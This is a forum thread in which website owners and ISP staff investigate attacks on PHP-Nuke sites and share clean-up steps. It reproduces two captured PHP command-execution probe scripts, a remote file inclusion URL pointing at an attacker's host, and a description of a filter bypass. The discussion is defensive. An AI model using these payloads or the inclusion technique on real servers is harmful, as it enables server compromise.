cancel
Showing results for 
Search instead for 
Did you mean: 

Hackers of PHP nuke websites

BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Hackers of PHP nuke websites

..are using a new tool.
has anyone seen this code before?
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;


thats one of many similar hackers that have been caught .
One actually got through and replaced the file favourites.php , then dropped a tarred, gzipped file into the root of my webspace.
and a file named error.php into the root of the webspace.
guess what .. the hack came from a plusnet address.
I doubt that the hack originated there , it is most likely that the hacker actually hacked another plusnet account to hack from there as he had uploaded a SSH script to his/her webspace.
I suspect that the hacker has uploaded the same script to the other unsuspecting plusnet users webspace to use as a platform for cracking other webspaces and networks

this is not uncommon with ..I keep calling it hacking .. it is actually called cracking.

look in your php-nuke structure for a file named favourite.php .. check the date of the file
if the date is newer than the other files in that directory .. it has been cracked.
DONT DELETE THE FILE
make it an empty file .. delete the contents of that file only leaving the <?php and ?> than make the file READ ONLY
I have no idea why the file is in the php-nuke distribution , I have looked all over my live site an can see nowhere that I can click on anything remotely looking like favourites.
check also the root of your webspace for error.txt or error.php they have been left by the cracker with a simple text line reading "[Censored]" , not pleasant.. but it is there.

check the root of your webspace for a file ending .tar.gz  or similar.
this is NOT part of your php-nuke installation .. a cracker has placed it there .. remove it.
how do I know?
I have caught 214 of these [Censored] in just over a week
as I said .. 1 got through .. and I closed that door also
plusnet admins , check my ccgi space please , I moved the file into a directory I made named GOTCHA , the directory and file is now read only , you will have to change permissions to see it. please remove the file and directory after you have seen it.
prolly best to look at it in a root jail or similar.

proof of cracking? .. here .. look at this.
http://planetquakewar.com/images/cracker_banned.bmp

update this thread if you find anything similar in your php-nuke installations.

10 REPLIES
Prod_Man
Grafter
Posts: 286
Registered: 04-08-2007

Re: Hackers of PHP nuke websites

I can vouch for that .. I had the same problem..
even after clearing bans from the 'nuke_blocked_iplist' the probler perissted.
it's using the UNIX: id command possibly to manipulate userinfo ...
all I know is it needs to be parsed excess values for it to function,
it essentially provides a way of viewing files I think (from how it appears).
Mic22 looks to be a tag aswell
(I forget what version of Nuke we put on ... it maybe also SQL Injectable if it's not a later version that on Wolfstuff)
Jim,
Plusnet Staff
Plusnet Staff
Posts: 17,641
Thanks: 535
Fixes: 159
Registered: 05-04-2007

Re: Hackers of PHP nuke websites

Quote
plusnet admins , check my ccgi space please , I moved the file into a directory I made named GOTCHA , the directory and file is now read only , you will have to change permissions to see it. please remove the file and directory after you have seen it.

I think I actually placed a ticket on your account yesterday about this Wink We noticed your site had been cracked but didn't know that you had created the GOTCHA file. I'll give the networks guys a nudge when I get in this morning about this.
If this post resolved your issue please click the 'This fixed my problem' button
 Chris Parr
 Plusnet Staff
Plusnet Staff
Plusnet Staff
Posts: 17,641
Thanks: 535
Fixes: 159
Registered: 05-04-2007

Re: Hackers of PHP nuke websites

Quote
guess what .. the hack came from a plusnet address.

Can you PM me with proof of this and the address it came from please.
If this post resolved your issue please click the 'This fixed my problem' button
 Chris Parr
 Plusnet Staff
BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

how much proof do you need.
check the bitmap image in my first post.
it gives the IP address which resolves to plusnet in London
it shows the method used
and it also shows the URL of the website holding the perl script.
prichardson
Grafter
Posts: 1,503
Registered: 05-04-2007

Re: Hackers of PHP nuke websites

The IP address quoted is our CCGI server itself.

r0ot@echo:~$ host 212.159.7.150
150.7.159.212.in-addr.arpa domain name pointer ccgi02.plus.net.

Looks to have been some form of relay attack which may or may not be on another customers webspace (this means it could even have been some form of relay, or backdoor relay in your own code).
Prod_Man
Grafter
Posts: 286
Registered: 04-08-2007

Re: Hackers of PHP nuke websites

It looks to be exploiting the "reg" series of PHP Commands.
if you look at the Query String, and provided U know the workings of PHPNukes' modules.php.
then you'd notice that the protection, in the modules.php, uses PHP's "reg" family (example eregi_replace), inorder to filter against certain invalid and exploitative characters or even simple relative path tricks.
it's just added a '*/' Delimiter to the "name" in the GET Method Var, to disable those functons and inject code from another file, remote or local. (in this case remote, cross site scripting).
but ... on the other hand if you can read Itallian or know basic latin such as "sospeso", Account suspended :
http://n3gro.altervista.org/tools/cmd?
doesn't exist (now) - account closed.. so it may not have been that but I guess it's a script spread amoungst "Security" sites and so forth.
Upon Googeling around this hostname, a number of other sites have this in their logs. so it's possibly a Nuke wide issue. Perhapse the Hosting company / site caught on to the fact that this was happening.
Here is yet another mirror of pretty much the same script Here
bearing in mind, that 'fsockopen' is available on PlusNet Web Hosting now (at least it was the last time I checked about 5 days ago).
You can create Sockets and make PHP scripts that would initiate just this kind of attack from what appears as one of the CCGI Servers instead of a "real" client.
What I also find confuzing is, this script looks to be labeld as a "Security" script according to one site ...
after Googeling the intial tag on the PHP scripts first line "Mic22", (according to Google Cache) Here) the home website claims to be this "Open Source Host-based Intrusion Detection System". But, I cannot find it offically on the website.
Please Correct me if I am wrong anywhere.
Jim,
BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

Quote from: P
Looks to have been some form of relay attack which may or may not be on another customers webspace

I said that in my first post.
the next step is to search the ccgi02 space for shell scripts that were not uploaded by plusnet customers.
similar to the script that I trapped and placed in the folder named GOTCHA on my webspace .. have you looked at that file yet?
you will need to chmod 0755 the folder to see the contents as I have made it 0644 to prevent a hacker accessing it.
please delete the folder and contents when you have examined it.
I beleive it is a perl shell script.

BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

lo Jim.
I think that the tag mic22 is actually a username for the script to access the perl shell script.
I have seen the script before with the tag 3l33t in the same place as mic22
hope that helps.
Prod_Man
Grafter
Posts: 286
Registered: 04-08-2007

Re: Hackers of PHP nuke websites

Google has rendered nothing from that other tag ... Sad
can't find any traces of perl scripts either.
( as far as I have searched / found )
it's at least in the same CCGI Root DIR / Server that your space is on.
ccgi02.plus.net | ( /files/home2/)
I would assume it's in the same space where your site is ...
because the folders are all:
chmod + owned to the individual users that they bleong to and root  plus (I assume, usernames for other processes / services ) - "php-user" / "sqluser" for security and so that scripts etc can run.
most likely a code injection (I think)...
1. Download the files from the Webspace (do that how ever you wish)
2. Run a Difference/Comparison against the "out-of-the-box"/default CMS code and see what we get.
's all I can think of that might be beneficial to finding the actual root cause at the moment.
Hope that helps..
Jim,
BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

remember I said that I have seen a script with another username?
have a lookit this
<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}


here is the formed URL
http://ccgi.linux2000.plus.com/index.php?basepath=http:/kisme.hostinggratisusa.com/safe.txt?Huh
and the attacker is using this URL
http://kisme.hostinggratisusa.com/safe.txt?Huh
from this IP
213.89.9.5
no he didnt get through :-)